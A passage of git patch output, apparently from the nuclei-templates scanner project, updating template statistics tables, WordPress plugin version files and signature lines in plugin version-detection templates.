| 1 | | | | | | | | | +| anti-malware_security_and_brute-force_firewall_project | 1 | | | | | | | | | +| graphpaperpress | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| eleanor-cms | 1 | | | | | | | | | +| kartatopia | 1 | | | | | | | | | +| advance-custom-field | 1 | | | | | | | | | +| azure-monitor | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| myspreadshop | 1 | | | | | | | | | +| books | 1 | | | | | | | | | +| vivino | 1 | | | | | | | | | +| naviwebs | 1 | | | | | | | | | +| imm | 1 | | | | | | | | | +| kramer | 1 | | | | | | | | | +| cobbler_project | 1 | | | | | | | | | +| f3 | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| printmonitor | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| marmoset | 1 | | | | | | | | | +| alquistai | 1 | | | | | | | | | +| rt-n16 | 1 | | | | | | | | | +| becon | 1 | | | | | | | | | +| massage-anywhere | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| b-elektro | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| wizard | 1 | | | | | | | | | +| steemit | 1 | | | | | | | | | +| scrapestack | 1 | | | | | | | | | +| nbr | 1 | | | | | | | | | +| zenserp | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| dukapress | 1 | | | | | | | | | +| rsshub | 1 | | | | | | | | | +| gohigheris | 1 | | | | | | | | | +| costa | 1 | | | | | | | | | +| mapstodonspace-mastodon-instance | 1 | | | | | | | | | +| cvsweb | 1 | | | | | | | | | +| twitcasting | 1 | | | | | | | | | +| pagekit | 1 | | | | | | | | | +| coremail | 1 | | | | | | | | | +| linuxorgru | 1 | | | | | | | | | +| geth | 1 | | | | | | | | | +| stageshow_project | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| maximo | 1 | | | | | | | | | +| openvas | 1 | | | | | | | | | +| privategpt | 1 | | | | | | | | | +| alltrails | 1 | | | | | | | | | +| policy-assignment | 1 | | | | | | | | | +| blackbox | 1 | | | | | | | | | +| phonepe-payment-solutions | 1 | | | | | | | | | +| awin | 1 | | | | | | | | | +| roteador | 1 | | | | | | | | | +| recrystallize | 1 | | | | | | | | | +| profile-builder | 1 | | | | | | | | | +| flyte | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| registry | 1 | | | | | | | | | +| demon | 1 | | | | | | | | | +| access | 1 | | | | | | | | | +| x-wrt | 1 | | | | | | | | | +| codis | 1 | | | | | | | | | +| wp-shoutbox-live-chat | 1 | | | | | | | | | +| mix | 1 | | | | | | | | | +| web2py | 1 | | | | | | | | | +| openedge | 1 | | | | | | | | | +| abuseipdb | 1 | | | | | | | | | +| fastbee | 1 | | | | | | | | | +| v2924 | 1 | | | | | | | | | +| blunet | 1 | | | | | | | | | +| phpbb | 1 | | | | | | | | | +| gotify | 1 | | | | | | | | | +| keepersecurity | 1 | | | | | | | | | +| easyen | 1 | | | | | | | | | +| pornhub-porn-stars | 1 | | | | | | | | | +| socialbundde | 1 | | | | | | | | | +| mawk | 1 | | | | | | | | | +| dasannetworks | 1 | | | | | | | | | +| joedolson | 1 | | | | | | | | | +| strava | 1 | | | | | | | | | +| shirnecms | 1 | | | | | | | | | +| sercomm | 1 | | | | | | | | | +| venomrat | 1 | | | | | | | | | +| images | 1 | | | | | | | | | +| xinclude | 1 | | | | | | | | | +| endress | 1 | | | | | | | | | +| wireclub | 1 | | | | | | | | | +| slideshare | 1 | | | | | | | | | +| securimage-wp-fixed_project | 1 | | | | | | | | | +| megamodelspl | 1 | | | | | | | | | +| linktree | 1 | | | | | | | | | +| queer | 1 | | | | | | | | | +| wagtail | 1 | | | | | | | | | +| booth | 1 | | | | | | | | | +| b2bbuilder | 1 | | | | | | | | | +| clockify | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| dgtl | 1 | | | | | | | | | +| shibboleth | 1 | | | | | | | | | +| hrsale | 1 | | | | | | | | | +| google-earth | 1 | | | | | | | | | +| 2kblater | 1 | | | | | | | | | +| justfans | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| snipe-it | 1 | | | | | | | | | +| conpot | 1 | | | | | | | | | +| yellowfin | 1 | | | | | | | | | +| fortiauthenticator | 1 | | | | | | | | | +| teamwork | 1 | | | | | | | | | +| nordpass | 1 | | | | | | | | | +| fine-art-america | 1 | | | | | | | | | +| zeta-producer | 1 | | | | | | | | | +| ipanel | 1 | | | | | | | | | +| asmx | 1 | | | | | | | | | +| garmin-connect | 1 | | | | | | | | | +| hostuxsocial-mastodon-instance | 1 | | | | | | | | | +| wp-video-gallery-free | 1 | | | | | | | | | +| xmall | 1 | | | | | | | | | +| fandom | 1 | | | | | | | | | +| celebrus | 1 | | | | | | | | | +| aim | 1 | | | | | | | | | +| web-access | 1 | | | | | | | | | +| jotform | 1 | | | | | | | | | +| namespace | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| shopex | 1 | | | | | | | | | +| polyfill-io | 1 | | | | | | | | | +| isecure | 1 | | | | | | | | | +| ubersmith | 1 | | | | | | | | | +| altenergy | 1 | | | | | | | | | +| dasan | 1 | | | | | | | | | +| title_experiments_free_project | 1 | | | | | | | | | +| simple-image-manipulator_project | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| vgm | 1 | | | | | | | | | +| ipdata | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| softvelum | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| qwiz-online-quizzes-and-flashcards | 1 | | | | | | | | | +| wp-smart-contracts | 1 | | | | | | | | | +| https | 1 | | | | | | | | | +| search-engine | 1 | | | | | | | | | +| smartofficepayroll | 1 | | | | | | | | | +| bws-social-login | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| bhagavadgita | 1 | | | | | | | | | +| m0r0n | 1 | | | | | | | | | +| cube105 | 1 | | | | | | | | | +| internet-archive-user-search | 1 | | | | | | | | | +| oglaszamy24hpl | 1 | | | | | | | | | +| vine | 1 | | | | | | | | | +| dwr | 1 | | | | | | | | | +| wps-hide-login | 1 | | | | | | | | | +| websheets | 1 | | | | | | | | | +| dolphin | 1 | | | | | | | | | +| smartzone | 1 | | | | | | | | | +| issuu | 1 | | | | | | | | | +| projectdiscovery | 1 | | | | | | | | | +| acquia | 1 | | | | | | | | | +| wpmudev | 1 | | | | | | | | | +| xds | 1 | | | | | | | | | +| chesscom | 1 | | | | | | | | | +| kongregate | 1 | | | | | | | | | +| monday | 1 | | | | | | | | | +| disk-encryption | 1 | | | | | | | | | +| prime-mover | 1 | | | | | | | | | +| compalex | 1 | | | | | | | | | +| post-status-notifier-lite | 1 | | | | | | | | | +| yeswehack | 1 | | | | | | | | | +| piekielni | 1 | | | | | | | | | +| sash | 1 | | | | | | | | | +| esocks5 | 1 | | | | | | | | | +| obcs | 1 | | | | | | | | | +| kenesto | 1 | | | | | | | | | +| scrutinizer | 1 | | | | | | | | | +| datahub | 1 | | | | | | | | | +| mhsoftware | 1 | | | | | | | | | +| plainviewplugins | 1 | | | | | | | | | +| intelliflash | 1 | | | | | | | | | +| garage_management_system_project | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| gloriatv | 1 | | | | | | | | | +| wpovernight | 1 | | | | | | | | | +| senayan | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 3ab49299dc..b1e1f4a35a 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 | -| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 | -| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | | -| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | | -| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | | -| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | | +| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 | +| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 | +| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | | +| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | | +| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | | +| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | | | osint | 807 | pikpikcu | 353 | javascript | 65 | | | | | -| tech | 722 | pdteam | 302 | ssl | 30 | | | | | -| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | | -| misconfig | 710 | geeknik | 231 | dns | 22 | | | | | +| tech | 729 | pdteam | 302 | ssl | 30 | | | | | +| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | | +| misconfig | 713 | geeknik | 231 | dns | 22 | | | | | From 2d7259d2ccf0484308303cbb589a512be9719c95 Mon Sep 17 00:00:00 2001 From: ghost Date: Mon, 14 Oct 2024 14:35:50 +0000 Subject: [PATCH 071/218] =?UTF-8?q?docs:=20update=20README=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index bddf18e1cd..c29a82d3b3 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 | -| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 | -| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | | -| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | | -| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | | -| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | | +| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 | +| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 | +| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | | +| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | | +| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | | +| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | | | osint | 807 | pikpikcu | 353 | javascript | 65 | | | | | -| tech | 722 | pdteam | 302 | ssl | 30 | | | | | -| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | | -| misconfig | 710 | geeknik | 231 | dns | 22 | | | | | +| tech | 729 | pdteam | 302 | ssl | 30 | | | | | +| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | | +| misconfig | 713 | geeknik | 231 | dns | 22 | | | | | -**718 directories, 9584 files**. +**723 directories, 9654 files**. From 16ef74c48932dccc4db8fe79fe38df77347b00d7 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 00:22:43 +0000 Subject: [PATCH 072/218] =?UTF-8?q?chore:=20update=20WordPress=20Plugins?= =?UTF-8?q?=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../plugins/all-in-one-wp-migration.txt | 2 +- .../plugins/header-footer-elementor.txt | 2 +- helpers/wordpress/plugins/jetpack.txt | 2 +- helpers/wordpress/plugins/wp-google-maps.txt | 2 +- .../wordpress/plugins/wp-maintenance-mode.txt | 2 +- .../wordpress/plugins/ad-inserter.yaml | 2 - .../wordpress/plugins/add-to-any.yaml | 2 - .../wordpress/plugins/admin-menu-editor.yaml | 2 - .../plugins/advanced-custom-fields.yaml | 2 - .../wordpress/plugins/akismet.yaml | 2 - .../plugins/all-in-one-seo-pack.yaml | 2 - .../plugins/all-in-one-wp-migration.yaml | 2 - .../all-in-one-wp-security-and-firewall.yaml | 2 - http/technologies/wordpress/plugins/amp.yaml | 2 - .../wordpress/plugins/antispam-bee.yaml | 2 - .../wordpress/plugins/astra-sites.yaml | 2 - .../wordpress/plugins/autoptimize.yaml | 2 - .../wordpress/plugins/backwpup.yaml | 2 - .../plugins/better-search-replace.yaml | 2 - .../wordpress/plugins/better-wp-security.yaml | 2 - .../plugins/black-studio-tinymce-widget.yaml | 2 - .../wordpress/plugins/breadcrumb-navxt.yaml | 2 - .../wordpress/plugins/breeze.yaml | 2 - .../plugins/broken-link-checker.yaml | 2 - .../wordpress/plugins/burst-statistics.yaml | 48 +++++++++++++++++++ .../technologies/wordpress/plugins/chaty.yaml | 2 - .../plugins/child-theme-configurator.yaml | 2 - .../wordpress/plugins/classic-editor.yaml | 2 - .../wordpress/plugins/classic-widgets.yaml | 2 - .../plugins/click-to-chat-for-whatsapp.yaml | 2 - http/technologies/wordpress/plugins/cmb2.yaml | 2 - .../wordpress/plugins/coblocks.yaml | 2 - .../wordpress/plugins/code-snippets.yaml | 2 - .../wordpress/plugins/coming-soon.yaml | 2 - .../wordpress/plugins/complianz-gdpr.yaml | 2 - .../plugins/contact-form-7-honeypot.yaml | 2 - .../wordpress/plugins/contact-form-7.yaml | 2 - .../wordpress/plugins/contact-form-cfdb7.yaml | 2 - .../wordpress/plugins/cookie-law-info.yaml | 2 - .../wordpress/plugins/cookie-notice.yaml | 2 - .../wordpress/plugins/copy-delete-posts.yaml | 2 - .../wordpress/plugins/creame-whatsapp-me.yaml | 2 - .../creative-mail-by-constant-contact.yaml | 2 - .../wordpress/plugins/custom-css-js.yaml | 2 - .../wordpress/plugins/custom-fonts.yaml | 2 - .../plugins/custom-post-type-ui.yaml | 2 - .../wordpress/plugins/disable-comments.yaml | 2 - .../wordpress/plugins/disable-gutenberg.yaml | 2 - .../wordpress/plugins/duplicate-page.yaml | 2 - .../wordpress/plugins/duplicate-post.yaml | 2 - .../wordpress/plugins/duplicator.yaml | 2 - .../duracelltomi-google-tag-manager.yaml | 2 - .../plugins/easy-table-of-contents.yaml | 2 - .../wordpress/plugins/easy-wp-smtp.yaml | 2 - .../wordpress/plugins/elementor.yaml | 2 - .../wordpress/plugins/elementskit-lite.yaml | 2 - .../plugins/enable-media-replace.yaml | 2 - .../wordpress/plugins/envato-elements.yaml | 2 - .../essential-addons-for-elementor-lite.yaml | 2 - .../plugins/ewww-image-optimizer.yaml | 2 - .../wordpress/plugins/extendify.yaml | 2 - .../plugins/facebook-for-woocommerce.yaml | 2 - .../wordpress/plugins/fast-indexing-api.yaml | 2 - .../wordpress/plugins/flamingo.yaml | 2 - .../wordpress/plugins/fluent-smtp.yaml | 2 - .../wordpress/plugins/fluentform.yaml | 2 - .../wordpress/plugins/font-awesome.yaml | 2 - .../plugins/force-regenerate-thumbnails.yaml | 2 - .../wordpress/plugins/formidable.yaml | 2 - .../wordpress/plugins/forminator.yaml | 2 - .../plugins/ga-google-analytics.yaml | 2 - .../plugins/gdpr-cookie-compliance.yaml | 2 - .../google-analytics-dashboard-for-wp.yaml | 2 - .../google-analytics-for-wordpress.yaml | 2 - .../plugins/google-listings-and-ads.yaml | 2 - .../wordpress/plugins/google-site-kit.yaml | 2 - .../plugins/google-sitemap-generator.yaml | 2 - .../wordpress/plugins/gtranslate.yaml | 2 - .../wordpress/plugins/gutenberg.yaml | 2 - .../plugins/happy-elementor-addons.yaml | 2 - .../plugins/header-footer-code-manager.yaml | 2 - .../plugins/header-footer-elementor.yaml | 2 - .../wordpress/plugins/header-footer.yaml | 2 - .../wordpress/plugins/health-check.yaml | 2 - .../wordpress/plugins/hello-dolly.yaml | 2 - .../plugins/host-webfonts-local.yaml | 2 - .../wordpress/plugins/hostinger.yaml | 2 - .../wordpress/plugins/image-optimization.yaml | 2 - .../wordpress/plugins/imagify.yaml | 2 - .../plugins/insert-headers-and-footers.yaml | 2 - .../wordpress/plugins/instagram-feed.yaml | 2 - .../plugins/intuitive-custom-post-order.yaml | 2 - .../wordpress/plugins/jetpack-boost.yaml | 2 - .../wordpress/plugins/jetpack.yaml | 2 - .../wordpress/plugins/kadence-blocks.yaml | 2 - .../technologies/wordpress/plugins/kirki.yaml | 2 - .../wordpress/plugins/leadin.yaml | 2 - .../limit-login-attempts-reloaded.yaml | 2 - .../plugins/limit-login-attempts.yaml | 2 - .../wordpress/plugins/litespeed-cache.yaml | 2 - .../wordpress/plugins/loco-translate.yaml | 2 - .../wordpress/plugins/loginizer.yaml | 2 - .../plugins/mailchimp-for-woocommerce.yaml | 2 - .../wordpress/plugins/mailchimp-for-wp.yaml | 2 - .../wordpress/plugins/mailpoet.yaml | 2 - .../wordpress/plugins/maintenance.yaml | 2 - .../wordpress/plugins/mainwp-child.yaml | 2 - .../wordpress/plugins/malcare-security.yaml | 2 - .../wordpress/plugins/megamenu.yaml | 2 - .../wordpress/plugins/members.yaml | 2 - .../wordpress/plugins/meta-box.yaml | 2 - .../wordpress/plugins/metform.yaml | 2 - .../wordpress/plugins/ml-slider.yaml | 4 +- .../wordpress/plugins/newsletter.yaml | 2 - .../plugins/nextend-facebook-connect.yaml | 2 - .../wordpress/plugins/nextgen-gallery.yaml | 2 - .../wordpress/plugins/ninja-forms.yaml | 2 - .../wordpress/plugins/ocean-extra.yaml | 2 - .../plugins/official-facebook-pixel.yaml | 2 - .../plugins/one-click-demo-import.yaml | 2 - .../wordpress/plugins/optinmonster.yaml | 2 - .../wordpress/plugins/otter-blocks.yaml | 2 - .../wordpress/plugins/password-protected.yaml | 2 - .../wordpress/plugins/pdf-embedder.yaml | 2 - .../plugins/pinterest-for-woocommerce.yaml | 2 - .../wordpress/plugins/pixelyoursite.yaml | 2 - .../wordpress/plugins/polylang.yaml | 2 - .../wordpress/plugins/popup-maker.yaml | 2 - .../wordpress/plugins/post-smtp.yaml | 2 - .../wordpress/plugins/post-types-order.yaml | 2 - .../plugins/premium-addons-for-elementor.yaml | 2 - .../wordpress/plugins/pretty-link.yaml | 2 - .../plugins/really-simple-captcha.yaml | 2 - .../wordpress/plugins/really-simple-ssl.yaml | 2 - .../wordpress/plugins/redirection.yaml | 2 - .../wordpress/plugins/redux-framework.yaml | 2 - .../plugins/regenerate-thumbnails.yaml | 2 - .../plugins/royal-elementor-addons.yaml | 2 - .../wordpress/plugins/safe-svg.yaml | 2 - .../wordpress/plugins/seo-by-rank-math.yaml | 2 - .../wordpress/plugins/sg-cachepress.yaml | 2 - .../wordpress/plugins/sg-security.yaml | 2 - .../plugins/shortcodes-ultimate.yaml | 2 - .../plugins/shortpixel-image-optimiser.yaml | 2 - .../plugins/simple-custom-post-order.yaml | 2 - .../wordpress/plugins/simple-history.yaml | 2 - .../wordpress/plugins/siteguard.yaml | 2 - .../wordpress/plugins/siteorigin-panels.yaml | 2 - .../wordpress/plugins/smart-slider-3.yaml | 2 - .../wordpress/plugins/so-widgets-bundle.yaml | 2 - .../sticky-header-effects-for-elementor.yaml | 2 - .../stops-core-theme-and-plugin-updates.yaml | 2 - .../wordpress/plugins/sucuri-scanner.yaml | 2 - .../wordpress/plugins/svg-support.yaml | 2 - .../wordpress/plugins/tablepress.yaml | 2 - .../plugins/taxonomy-terms-order.yaml | 2 - .../wordpress/plugins/templately.yaml | 2 - .../plugins/the-events-calendar.yaml | 2 - .../wordpress/plugins/tinymce-advanced.yaml | 2 - .../plugins/translatepress-multilingual.yaml | 2 - .../ultimate-addons-for-gutenberg.yaml | 2 - .../plugins/under-construction-page.yaml | 2 - .../wordpress/plugins/updraftplus.yaml | 2 - .../wordpress/plugins/user-role-editor.yaml | 2 - .../wordpress/plugins/w3-total-cache.yaml | 2 - .../plugins/webp-converter-for-media.yaml | 2 - .../wordpress/plugins/webp-express.yaml | 2 - .../woo-cart-abandonment-recovery.yaml | 2 - .../woo-checkout-field-editor-pro.yaml | 2 - .../plugins/woo-variation-swatches.yaml | 2 - .../plugins/woocommerce-gateway-stripe.yaml | 2 - .../plugins/woocommerce-legacy-rest-api.yaml | 2 - .../plugins/woocommerce-payments.yaml | 2 - .../plugins/woocommerce-paypal-payments.yaml | 2 - ...oocommerce-pdf-invoices-packing-slips.yaml | 2 - .../plugins/woocommerce-services.yaml | 2 - .../wordpress/plugins/woocommerce.yaml | 2 - .../wordpress/plugins/wordfence.yaml | 2 - .../wordpress/plugins/wordpress-importer.yaml | 2 - .../wordpress/plugins/wordpress-seo.yaml | 2 - .../wordpress/plugins/worker.yaml | 2 - .../wordpress/plugins/wp-crontrol.yaml | 2 - .../wordpress/plugins/wp-fastest-cache.yaml | 2 - .../wordpress/plugins/wp-file-manager.yaml | 2 - .../wordpress/plugins/wp-google-maps.yaml | 2 - .../wordpress/plugins/wp-mail-logging.yaml | 2 - .../wordpress/plugins/wp-mail-smtp.yaml | 2 - .../plugins/wp-maintenance-mode.yaml | 2 - .../wordpress/plugins/wp-multibyte-patch.yaml | 2 - .../wordpress/plugins/wp-optimize.yaml | 2 - .../wordpress/plugins/wp-pagenavi.yaml | 2 - .../wordpress/plugins/wp-reset.yaml | 2 - .../plugins/wp-reviews-plugin-for-google.yaml | 2 - .../wordpress/plugins/wp-rollback.yaml | 2 - .../wordpress/plugins/wp-seopress.yaml | 2 - .../wordpress/plugins/wp-sitemap-page.yaml | 2 - .../wordpress/plugins/wp-smushit.yaml | 2 - .../wordpress/plugins/wp-statistics.yaml | 2 - .../wordpress/plugins/wp-super-cache.yaml | 2 - .../wordpress/plugins/wpcf7-recaptcha.yaml | 2 - .../wordpress/plugins/wpcf7-redirect.yaml | 2 - .../wordpress/plugins/wpforms-lite.yaml | 2 - .../wordpress/plugins/wps-hide-login.yaml | 2 - .../plugins/wpvivid-backuprestore.yaml | 2 - .../plugins/yith-woocommerce-wishlist.yaml | 2 - 205 files changed, 54 insertions(+), 404 deletions(-) create mode 100644 http/technologies/wordpress/plugins/burst-statistics.yaml diff --git a/helpers/wordpress/plugins/all-in-one-wp-migration.txt b/helpers/wordpress/plugins/all-in-one-wp-migration.txt index 4c07730c2b..958eb02291 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-migration.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-migration.txt @@ -1 +1 @@ -7.86 \ No newline at end of file +7.87 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer-elementor.txt b/helpers/wordpress/plugins/header-footer-elementor.txt index c90bc2bb89..fa800971a6 100644 --- a/helpers/wordpress/plugins/header-footer-elementor.txt +++ b/helpers/wordpress/plugins/header-footer-elementor.txt @@ -1 +1 @@ -1.6.42 \ No newline at end of file +1.6.43 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt index c8eea28c61..f8b8809d01 100644 --- a/helpers/wordpress/plugins/jetpack.txt +++ b/helpers/wordpress/plugins/jetpack.txt @@ -1 +1 @@ -13.9 \ No newline at end of file +13.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-google-maps.txt b/helpers/wordpress/plugins/wp-google-maps.txt index b352084cac..cf50489733 100644 --- a/helpers/wordpress/plugins/wp-google-maps.txt +++ b/helpers/wordpress/plugins/wp-google-maps.txt @@ -1 +1 @@ -9.0.40 \ No newline at end of file +9.0.41 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-maintenance-mode.txt b/helpers/wordpress/plugins/wp-maintenance-mode.txt index af90a73292..dc5e9440ad 100644 --- a/helpers/wordpress/plugins/wp-maintenance-mode.txt +++ b/helpers/wordpress/plugins/wp-maintenance-mode.txt @@ -1 +1 @@ -2.6.12 \ No newline at end of file +2.6.13 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index cedf86ff34..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e323d58b263489625f1f129cf091ffa5d1ebf65e3540bf94d4b19648d86b01f2022100a6aa672c10473d86bada5ba0af1f3bb4ac1621cea02317b93ed376538a2cd87e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index cbc1fcca1d..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022028aeb197d7302a378298353bacdc9b3ff8e19b77e4b07e1fa243fd59fa88ac0b022100d68a3e2ac348640b08b6d05e394c972ac510c9a9601857778c43663b4960fedd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 99dc796279..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210089a5a2daab49d50664d6fe558febfb7401d7e8b0a6d9ff5600082b02088c45eb0220304f37bfd86f2f9fd2e577653b60875a63a1567ad7cf947eff08a9585123ae4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cbf27553ca..1f02455962 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008b3c96beb2250448fdf84d4cd5fdab2c8b82666146fdc63b8e5175199b012eec022100e6c6f80bc964ca01dd83c66089d5bad88c15f1d7402c793f06de38187ef104a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index d6d7bbee44..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022020738b8306c522370ca44e8b2474297da1b4b271520a665d93043d081af63c3602206400be5825d63aafa01b6a8b41470e9e8b81a4ffabd7eaa030149663bc271da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 22333717b7..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220344a40b863450bab36d1fc640fa8d940fd20e3ccbfb7dc2231b78a539af554b402202a8f501dd60ec1402630e22a3ccb38cb142e135bee2fae42d4f62d7009f1c4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 356e3da4a6..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220674622483ac7fc6b82216e77e796d5905348ab761d107ff7bcd5ae952155ca63022040835ae04581eec5dab37a941542076d06bb4c0e0027e775622b7aa7a99055f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 0a0bcbde7a..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204605ad89ba110f60301e2f5cb8dc0929a4db54d972f739744889a568d871cd740221008e34bf4e0ea205f0f75691a5f1a4a4ec437a208fc12850704847698b72bc57c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 7dc85ad513..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204faffe392049b24bcfa5ee9411df4bef783cc7ad44aa4dc7b95532957c52fd25022100a70a24d1d19e66198499876a04b11d3f2803a0ff5adcab4adb29bcd9069a0014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml 